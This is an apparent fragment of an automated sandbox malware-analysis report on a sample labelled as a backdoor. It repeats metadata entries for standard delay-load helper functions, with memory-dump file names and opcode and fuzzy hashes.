                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 7b98bb3a143ad546a53d2564d7c7440c72edc54703c45cc6a578a4e4664fb949
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 7b98bb3a143ad546a53d2564d7c7440c72edc54703c45cc6a578a4e4664fb949
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: e6e6dbf2056e80121c51dd1e6a716d8d3fb20edb0001303c159d6dcfb9be904e
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: e6e6dbf2056e80121c51dd1e6a716d8d3fb20edb0001303c159d6dcfb9be904e
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: f69c8c4edfb901030569601d8de2988204d5155fb18ece74099792991bf3cbc3
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: f69c8c4edfb901030569601d8de2988204d5155fb18ece74099792991bf3cbc3
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 51c2fdc0ae1090d0fc9adb8685b48090474ed3ce06e17074a968a3f7d8f30774
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 51c2fdc0ae1090d0fc9adb8685b48090474ed3ce06e17074a968a3f7d8f30774
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 14924fd2d263d723da3a21a7f53b6b4aa665ce73c14ff3b97de4a091867181f1
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 14924fd2d263d723da3a21a7f53b6b4aa665ce73c14ff3b97de4a091867181f1
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: b81e4527665b3fa0c47f8864d1cb1029db63a260e785a968fa4a5c1746d251f3
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: b81e4527665b3fa0c47f8864d1cb1029db63a260e785a968fa4a5c1746d251f3
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8c64d69dc72efa8ca72198a36496a6f8f436d27b5b75861e0edcb33037714a58
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: 8c64d69dc72efa8ca72198a36496a6f8f436d27b5b75861e0edcb33037714a58
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: a1e580153f00bd471a42c0678dd7f0fef89e6ac225fafd2a4f3e64d0027a4b55
                                                • Instruction ID: d206607b65758ac2381fb02f4015af0cb8d021dc4ddc6e1197fcbfb43e6cb400
                                                • Opcode Fuzzy Hash: a1e580153f00bd471a42c0678dd7f0fef89e6ac225fafd2a4f3e64d0027a4b55
                                                • Instruction Fuzzy Hash: CBA0129116E043BC301861026C16C36020CC4C8B503304409B41AD01C094482C040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 0c6a826b6c0a15e0fd4cbd0024c1fa4ca9d1eb0d70ba0ba6e174bffaad13990c
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 0c6a826b6c0a15e0fd4cbd0024c1fa4ca9d1eb0d70ba0ba6e174bffaad13990c
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 416f86dcabefc99b05faa17136819500fa07143e50c1759454b0e6456ecc7423
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 416f86dcabefc99b05faa17136819500fa07143e50c1759454b0e6456ecc7423
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8180d1e1a8b2e1cc4aa42afafa891bc1124f5326899eabf39d0542ccd73543aa
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 8180d1e1a8b2e1cc4aa42afafa891bc1124f5326899eabf39d0542ccd73543aa
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 7314435d17ab17b02bb62296d8f589e4704c322790c3ed7d53e3e639ef3b2dc6
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 7314435d17ab17b02bb62296d8f589e4704c322790c3ed7d53e3e639ef3b2dc6
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 207bd5b26bdd9df7ba90a1fba9cdefbe98c26a729953186922fab063598d9a3f
                                                • Instruction ID: 38bdcbee7cfec3144f5ee66f20f1db662538cb5c58a14078dacce8dce6c3c67e
                                                • Opcode Fuzzy Hash: 207bd5b26bdd9df7ba90a1fba9cdefbe98c26a729953186922fab063598d9a3f
                                                • Instruction Fuzzy Hash: 9EA0029516E142BC715875536D16D3A425CD4C9B51330851AF426D4185554C5D455471
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 42cd2240d71bae4c7d98c96e8b4a1fc55e01ccd88363538d6654d2d440ccfe45
                                                • Instruction ID: e03b86cbb504b163cb8d4511b5de9d491f070c356b980664e0e3f0c24e5c78fa
                                                • Opcode Fuzzy Hash: 42cd2240d71bae4c7d98c96e8b4a1fc55e01ccd88363538d6654d2d440ccfe45
                                                • Instruction Fuzzy Hash: 91A0129126E0417C3058B103AC06C3A020CD0C4B11330811AF426D0184544C0D040430
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
